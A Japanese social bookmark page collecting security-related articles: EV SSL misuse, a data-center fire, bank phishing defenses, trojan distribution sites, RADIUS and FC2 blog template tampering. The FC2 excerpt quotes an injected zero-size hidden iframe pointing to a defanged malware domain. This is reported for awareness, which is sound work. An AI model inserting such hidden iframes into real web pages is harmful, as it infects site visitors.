タグ

securityとサービスプロバイダーに関するkgbuのブックマーク (7)

  • 高木浩光@自宅の日記 - EV SSLを緑色だというだけで信用してはいけない実例

    ■ EV SSLを緑色だというだけで信用してはいけない実例 EV SSLに関して以前から懸念されていたことが既に現実になっていた。一時期、EV証明書を発行する一部のCA事業者が、EV SSLの宣伝で「緑色になったら安全」などといいかげんな広告を打っていて、誤った理解が広まりかねないと心配されていたわけだが、「緑色になったら安全」という理解がなぜ駄目なのか、その理由の一つは、いわゆる「共用SSL」サービスにEV SSLが使われかねないという懸念だった。 そして、その実例が既に存在していたことに気付いた。図1は私が作ったWebページである。 アドレスバーは緑色になっているが、ここに入力されたデータは私宛にメールで送信*1されてくる。(このページは既に閉鎖している。) 悪意ある者がこうしたページを作成*2し、何らかの方法でこのページに人々を誘導*3すれば、フィッシングの被害が出るおそれがある。

    kgbu
    kgbu 2009/06/29
    EV SSLで共用SSLサービスを提供しているところがあるらしい。サービス提供者の審査でもしてくれるのかしら(汗 それならわからんでもないが...EV SSLの主旨とはハズレる気がするなぁ。広まりませんように。
  • さくらインターネットのデータセンター、リアルに炎上してサーバダウン | スラド IT

    さくらインターネットの西新宿データセンターで火災騒ぎがあり、サーバがダウンした。同社のお知らせによると、2008年12月19日 12時35分頃に電源設備から発煙し、一部のラックへの電源供給が停止されているとのこと。14:05更新の情報では、「6F Aゾーンの配電盤3台、6F Bゾーンの配電盤2台の片系統もしくは両系統の電源供給停止」という状況らしい。早急な復旧を望みたい。 このデータセンターにはさくらインターネット以外にも多数の企業がサーバーを設置していたようで、この影響によりいくつかのサイトが現在アクセス不能になっているようだ。

  • 高木浩光@自宅の日記 - 地方銀行のEV SSL対応はどうなったか

    ■ 地方銀行のEV SSL対応はどうなったか 2005年2月20日の日記で「フィッシング防止のため地方銀行はこうするべき」ということを書いた。つまり、インターネットバンキングのログイン画面のページで、ちゃんと銀行のドメイン名を使用するべきだという話だった。たとえば、NTTデータの「ANSER WEB」を利用してインターネットバンキングのサービスを提供している小さな銀行らは、anser.or.jp というドメイン名のURLのページ上にログイン画面があるため、一般の利用者達にとって、物と見分けるのが簡単ではなかろうという話だった。 そして今年の4月、次のニュースが出た。 インターネットバンキングサービスのフィッシング対策を強化! 〜「EV SSL証明書」と「フィッシングサイト閉鎖サービス」を導入〜, NTTデータ, 2008年4月22日, NTTデータでは、こうした状況を踏まえ、サイトの信頼

    kgbu
    kgbu 2008/06/30
    携帯や組み込み機器にインストールされている認証鍵をうまく更新できる仕組みを作らないのは誰のせいなんだろうか。モラルが低い?Verisignのpublicityの強さ?
  • リネージュ資料室 - ガイド >> セキュリティ対策 (ウィルス情報 - 感染源サイト)

    これまでに確認した主にリネージュ関連のトロイの木馬感染源となるサイトについて、 それぞれの手口をご紹介します。 決してここにご紹介したサイトがすべてというわけではありません。 あくまで、具体的な手口の参考情報としてお読みください。 安全のため悪意あるサイトのURLへはリンクしていませんが、 危険ですので興味位にでもアクセスしたりしないでください。 なお、以前はどのようなHTMLコードが含まれているのかご紹介していましたが、 Norton AntiVirusなどでそのサンプルHTMLをウィルスと誤検出することがあるため (実際にはウィルスではありませんし、 仮にテキストにコピーしてブラウザに読み込ませても感染しないよう加工してはありましたが)、 サンプルを削除しました。 L2クエスト攻略サイト改竄 XREA利用サイトの改竄 XREA広告改竄 さくらインターネット経路ハイジャック SeedC

    kgbu
    kgbu 2008/06/16
    さくらインターネットは、広く使われているんだね。AmazonEC2がこういうことになる可能性はどれくらいなんだろう?
  • 認証だけでなく課金管理も担うRADIUS

    前回は企業に認証サーバが必要な理由をお話した。今回はいよいよ、RADIUSのお話に移ろうと思う。RADIUSといえば認証、認証といえばRADIUSといわれるくらい、広く認識されている。まずは、この概要をおさらいしてみたい。 RADIUSとは? RADIUSとはいうまでもなく、Remote Authentication Dial In User Serviceの頭文字を取ったもので「ラディウス」と発音される。読んで字のままだが、もともとはリモートアクセスサーバ(RAS:Remote Access Server)のユーザー認証のために開発されていたプロトコルである。Merit Networks社およびLivingSton社<現在はLucent Technologies社>が開発を行い、これが最終的にIETF標準(RFCスタンダード)となっている。 プロトコル自体はUDPベースのクライアント/サ

    認証だけでなく課金管理も担うRADIUS
  • FC2ブログの歩き方ブログ:テンプレートの改ざんとウイルスサイトへのリンク [news・security_alert]

    アルキカタサイトニュースより転載 FFXI:戦士スキーのブログ:テンプレートが書き換えられている!※ FF11 ペット狩り黒奮闘記:ウイルス検出について【報告】 某青魔導士のFF11雑記:緊急告知<ブログ改竄>※ 先日来、オンラインゲーム(ネットゲーム)のアカウントハックを狙う悪質なスパムの話題をお伝えしてきましたが、今回は、FC2ブログのテンプレートが改ざんされ、そのブログにアクセスしたユーザがウイルス感染、アカウントハックを企てられるという事例です。 (2008/3/10現在、※のブログは現在プライベートモードに設定されています) 上記ブログの管理人さんたちは、テンプレートの中に<iframe src="http://www■dda3■net" width="0" height="0"></iframe>を書き込まれていた、と訴えています。 <iframe>~</iframe>とは、

    kgbu
    kgbu 2008/03/06
    ブログテプレートが改竄されて、iframeタグが埋め込まれてしまうケースがFC2のブログで起こったという。パスワードが辞書攻撃にあった模様。
  • カスタムポリシーファイル crossdomain.xml について - yoshiweb.NET-blog

    Flash でドメインをまたいで外部ファイルを読み込みたい場合 参照側のサーバー(外部ファイルが置いてある方)に crossdomain.xmlという名前のXMLが必要らしいです。 XMLの書き方は 全てのドメインのアクセスを許可する(どこからでもOK〜!にする)ときは 以下の記述をしたXML「crossdomain.xml」をルートディレクトリに配置 他の全てのドメインから読み込まれるのを防ぐ(他のドメインは全部ダメー!にする)ときは crossdomain.xmlファイルを設置しない! もしくはallow-access-from タグのない crossdomain.xml ファイルをルートディレクトリに配置 crossdomain.xml の各要素の内容 メタポリシー設定 all: すべてのポリシーファイルが許可されます。 by-content-type: Content-Typeがt

  • 1